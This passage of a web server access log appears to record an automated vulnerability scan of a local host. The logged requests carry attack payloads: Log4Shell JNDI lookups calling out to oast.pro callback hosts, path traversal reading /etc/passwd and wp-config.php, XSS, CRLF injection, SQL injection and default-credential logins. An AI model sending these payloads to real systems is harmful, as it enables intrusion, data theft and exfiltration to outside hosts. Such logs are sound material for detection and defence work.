HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elfinder.min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sphider/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/lesson/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"{\x22entry\x22:\x22Evil\x22,\x22request\x22:\x22id\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/customMethod HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"${jndi:ldap://${hostName}.useragent.ca28bc0smpvbbtig07h0j5bzgmpewj5dp.oast.pro}", "http_referer":"${jndi:ldap://${hostName}.referer.ca28bc0smpvbbtig07h0a1m4n5h3r5ybn.oast.pro}", "request_method":"GET", "http_x_forwarded_for":"${jndi:ldap://${hostName}.xforwardedfor.ca28bc0smpvbbtig07h0cyhs4b654kyue.oast.pro}"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elFinder.version.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.ca28bc0smpvbbtig07h0sdu9weew13nf3.oast.pro}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /\x5Cu001B]8;;https://example.com\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22arlpass\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query={__typename} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/xml/webuser-auth.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"{u:\x22admin\x22, t:\x22undefined\x22, p:\x22trilithic\x22, d:\x22\x22, r:false, w:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interface/login/login.php?site=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd 